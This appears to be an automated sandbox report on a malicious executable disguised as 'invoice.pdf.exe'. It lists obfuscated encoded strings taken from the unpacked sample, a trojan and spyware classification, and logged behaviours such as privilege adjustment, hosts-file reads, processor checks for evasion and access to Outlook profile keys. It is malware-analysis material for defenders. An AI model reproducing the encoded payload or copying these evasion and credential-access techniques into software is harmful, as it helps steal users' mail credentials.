Npn1tfEPksJRjfEPkRXZp0EPEsJRjxEPERVZopEOOLbBDNNPuZSRDHK2usJwF8NNNRGOuRRTuRTSuRTwzxbBNNNPtNEOtbeNNLdNNNGZNVNXNNNNNfNNORNN3WYNNOjXQbNNNbbBjNNPaZwNNNXPjpPomjNNNc0VtNNNDbeNNLdRmNRNRbNNNNZNNNENNWiZDNNPuuopm0NNNbYNz8kNNNXTAbZSt0eUjpPPEuiCtNNPu8DXQ8NNNbbDNNNPz9ONNNXWtxL1t0WPQUqO29PNNNXPvfNOvbNNOZjNDNUNNNNQDNNRDNHPvfNOvcTNNVJztVKztVLzvtENNNTNPbNNNNGZNZNVNNNNN4NNORNsttNNNE+PDNNOU4XNNNRXORNNNLNpwfNNUNXXjNTXuZjNtNFNNNNQjNNRDNPNluQNNNXXRDNNNbXXjNTXtNNRmNONNjNNNNDNNNENNVbEDNNPtbeNNLdRmNONONNNNNENNNENANWNNNPXPRNNNbXXjNTXuZjNDNZNNNNQtNNRDNPXRLNNNbXXjNTXuZjNtNqNNNNRtNNRDNPwNLNNOfH/tRYOljVXNRNNPfXXjHNNtbeNNLdWtNQ/uHTNNNoXvLNNvtzNNNXNPbNNNNGZNVNADNNNOZNNORNNagVNNNXo0xNNNbYO4jWNNNoSC4OQNtfSPtPNNNePjW7FNNNPtqiFtNNPtNNNNpXXjNTXyVNNvtzNNNXNNWmFjNNPa1VNNNXXv4bTNNNObNZNNNRXu4PXPLNNNbdNNOPH0cPNDNONNNNNNNZNNNNqwVhZP41ZQplAjNNNNNSNTjNNNPbPDNNV34NNODXNNOjPDNNV1A0pzyhM3ZNNNNNuOZNNTDNNNNwIIZN6OZNNONNNNNwE1IWENNNNCtGNNQ0ONNNV0Wfo2VNNNNNNNNNNtNNNIpIbtxWQjNNNCbOZjNJNNNONNNNBDNNNNfNNNNZNNNNVjNNNORNNNOYNNNNCjNNNOZNNNNTNNNNPtNNNNjNNNNWNNNNNDNNNNDNNNNONNNNNjNNNNZNNNNPNNNNNNNZODRNNNNNNNLNdtBJOjLNSjFJOjLNztYZOt8NQttNNNLN2jXzODLNwDBzODLN/tBzODLNltBzODLN4jBzODL
Source: 1.0.invoice.pdf.exe.b0000.0.unpack, frmLogin.cs	Base64 encoded string: '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
Source: 1.2.invoice.pdf.exe.b0000.0.unpack, frmLogin.cs	Base64 encoded string: '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
Source: 2.0.invoice.pdf.exe.f80000.0.unpack, frmLogin.cs	Base64 encoded string: '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
Source: 2.2.invoice.pdf.exe.f80000.1.unpack, frmLogin.cs	Base64 encoded string: 'GIdDNNZNNNNRNNNN//8NNYtNNNNNNNNNDNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNtNNNNN4sht4NgNaAVotOGZ0uITucplOjpz9apzSgVTAuoz5iqPOvMFOlqJ4tnJ4tER9GVT1iMTHhQD0XWNNNNNNNNNODEDNNGNRQNViu868NNNNNNNNNNBNNNvRYNINNNPNNNNNTNNNNNNNNlw8NNNNtNNNNDNNNNNNNRDNtNNNNNtNNONNNNNNNNNNRNNNNNNNNNNPNNNNNNtNNNNNNNNZNDVHNNONNNONNNNNNRNNNRNNNNNNNNONNNNNNNNNNNNNNNUt/NNOCNNNNNRNNNBDQNNNNNNNNNNNNNNNNNNNNNNNNNTNNNNjNNNOpCjNNUNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNVNNNPNNNNNNNNNNNNNNNPPNNNRtNNNNNNNNNNNNNNP50MKu0NNNN0O8NNNNtNNNNVNNNNNVNNNNNNNNNNNNNNNNNNPNNNTNhpaAlLjNNNBDQNNNNDNNNNNDNNNNvNNNNNNNNNNNNNNNNNNONNNONYaWyoT9wNNNZNNNNNTNNNNNPNNNNWtNNNNNNNNNNNNNNNNNNDNNNDtNNNNNNNNNNNNNNNNNNNNPfCjNNNNNNNRtNNNNPNNHNhPHNNBjLNNNQNNNNNNNNNXD+NNP4NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNO4PXOLNNNbdWtNPXOpNNNbNXdMmTNNNPbNONNNRpkxNNNdNNtNNOUZnNNNXtNZNNNEmTjNNPbNRNNNRXuZjNDNDNNNNNDNNRDO+NDNNOT8pNNNXPvfNOvbGZNRNRNNNNNVNNORNstVNNNEiUDNNPtbeNNLdRmNONONNNNNQNNNENU4QNNNRok4NNNbXXjNTXuZjNDNDNNNNONNNRDO+ONNNOT8sNNNXPvfNOvbGZNVNCNNNNNHNNORNstHNNNDHXPNNNNbYOljuptRNNUQDODNNNvtuNNNXolVNNNcmVjNNPtjVtNHNNNDNNU4SNNNRPvfNOvbGZNRNPjNNNNLNNORNstLNNNDXXjNTXvVNNbNTNNNRXyMmQNNNOvtxNNNXqNLNNNXNOjNNOPbrNvtyNNNXXtNNRmNONNfNNNNUNNNENU4UNNNRPvfNOvbNRmNONNfNNNNUNNNENPtANNNTPvfNOvc+pwfNNUPNPNNNOUV7NNOjtNxNNNElBjNNpVNXNNNRXxbNNvtzNNNXNNZROFtENNNTNPbNNOZjONO0NNNNPNNNRDOmWjNNPtbTVYvPNDNtXWbONT8bNNNXXPxNNNbNNvtINNNTOPtHNNNTPjpbRjNNOtZbSDNNOvtFNNNTQNtbXtNNPt0WolfNNNbqzuZRRDEiYNNNPuhnRjHEOKV9NNOjTOvAStNNNFtgNNNXWuLbYtNNPtNdRmNSNWpNNNNWNNNENPtiNNNXN28jNNNXPjVPwzxK2cRspTRZNb5cS9LK2usJwF8NNNRANb5cS9bGOORRRjHJRjLeBtxEOtVEOcRVLDpEO5SugWjEOjAiZDNNPusn/tRGPORVRjxEPFjTSuZUNPfVNORUS9LGOjNEOusJRjLEOuRSZpNWNb5cTAbK1usnS9nAYjNNNFtlNNNXqNHNNOfXXjNTXtNGZNHNctNNNNbNNORNStfPomZNNNbGOkVUXQDNNNbZPNwLTgtAPEsnS9nAYjNNNEZRPOsnRjtJRjxeDjtK2uZXSuZYXl0PRDxEP281NNNXRjjFQPt2NNNXXQpNNNbJRDDUTvt4NNNXNNpn1tfEPksJRjfEPkRXZp0EPEsJRjxEPERVZopEOOLbBDNNPuZSRDHK2usJwF8NNNRGOuRRTuRTSuRTwzxbBNNNPtNEOtbeNNLdNNNGZNVNXNNNNNfNNORNN3WYNNOjXQbNNNbbBjNNPaZwNNNXPjpPomjNNNc0VtNNNDbeNNLdRmNRNRbNNNNZNNNENNWiZDNNPuuopm0NNNbYNz8kNNNXTAbZSt0eUjpPPEuiCtNNPu8DXQ8NNNbbDNNNPz9ONNNXWtxL1t0WPQUqO29PNNNXPvfNOvbNNOZjNDNUNNNNQDNNRDNHPvfNOvcTNNVJztVKztVLzvtENNNTNPbNNNNGZNZNVNNNNN4NNORNsttNNNE+PDNNOU4XNNNRXORNNNLNpwfNNUNXXjNTXuZjNtNFNNNNQjNNRDNPNluQNNNXXRDNNNbXXjNTXtNNRmNONNjNNNNDNNNENNVbEDNNPtbeNNLdRmNONONNNNNENNNENANWNNNPXPRNNNbXXjNTXuZjNDNZNNNNQtNNRDNPXRLNNNbXXjNTXuZjNtNqNNNNRtNNRDNPwNLNNOfH/tRYOljVXNRNNPfXXjHNNtbeNNLdWtNQ/uHTNNNoXvLNNvtzNNNXNPbNNNNGZNVNADNNNOZNNORNNagVNNNXo0xNNNbYO4jWNNNoSC4OQNtfSPtPNNNePjW7FNNNPtqiFtNNPtNNNNpXXjNTXyVNNvtzNNNXNNWmFjNNPa1VNNNXXv4bTNNNObNZNNNRXu4PXPLNNNbdNNOPH0cPNDNONNNNNNNZNNNNqwVhZP41ZQplAjNNNNNSNTjNNNPbPDNNV34NNODXNNOjPDNNV1A0pzyhM3ZNNNNNuOZNNTDNNNNwIIZN6OZNNONNNNNwE1IWENNNNCtGNNQ0ONNNV0Wfo2VNNNNNNNNNNtNNNIpIbtxWQjNNNCbOZjNJNNNONNNNBDNNNNfNNNNZNNNNVjNNNORNNNOYNNNNCjNNNOZNNNNTNNNNPtNNNNjNNNNWNNNNNDNNNNDNNNNONNNNNjNNNNZNNNNPNNNNNNNZODRNNNNNNNLNdtBJOjLNSjFJOjLNztYZOt8NQttNNNLN2jXzODLNwDBzODLN/tBzODLNltBzODLN4jBzODL

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/1@1/1

Source: C:\Users\user\Desktop\invoice.pdf.exe	Code function: 2_2_016BAF3E AdjustTokenPrivileges,		2_2_016BAF3E
Source: C:\Users\user\Desktop\invoice.pdf.exe	Code function: 2_2_016BAF07 AdjustTokenPrivileges,		2_2_016BAF07

Source: C:\Users\user\Desktop\invoice.pdf.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\invoice.pdf.exe.log

Jump to behavior

Source: C:\Users\user\Desktop\invoice.pdf.exe

Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking

Source: invoice.pdf.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\invoice.pdf.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior

Source: C:\Users\user\Desktop\invoice.pdf.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\invoice.pdf.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\invoice.pdf.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\invoice.pdf.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: invoice.pdf.exe, 00000001.00000002.240792649.0000000002701000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
Source: invoice.pdf.exe, 00000001.00000002.240792649.0000000002701000.00000004.00000001.sdmp	Binary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);

Source: invoice.pdf.exe	Virustotal: Detection: 34%
Source: invoice.pdf.exe	ReversingLabs: Detection: 21%

Source: unknown	Process created: C:\Users\user\Desktop\invoice.pdf.exe 'C:\Users\user\Desktop\invoice.pdf.exe'
Source: unknown	Process created: C:\Users\user\Desktop\invoice.pdf.exe C:\Users\user\Desktop\invoice.pdf.exe
Source: C:\Users\user\Desktop\invoice.pdf.exe	Process created: C:\Users\user\Desktop\invoice.pdf.exe C:\Users\user\Desktop\invoice.pdf.exe	Jump to behavior

Source: C:\Users\user\Desktop\invoice.pdf.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\invoice.pdf.exe

File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\invoice.pdf.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: invoice.pdf.exe

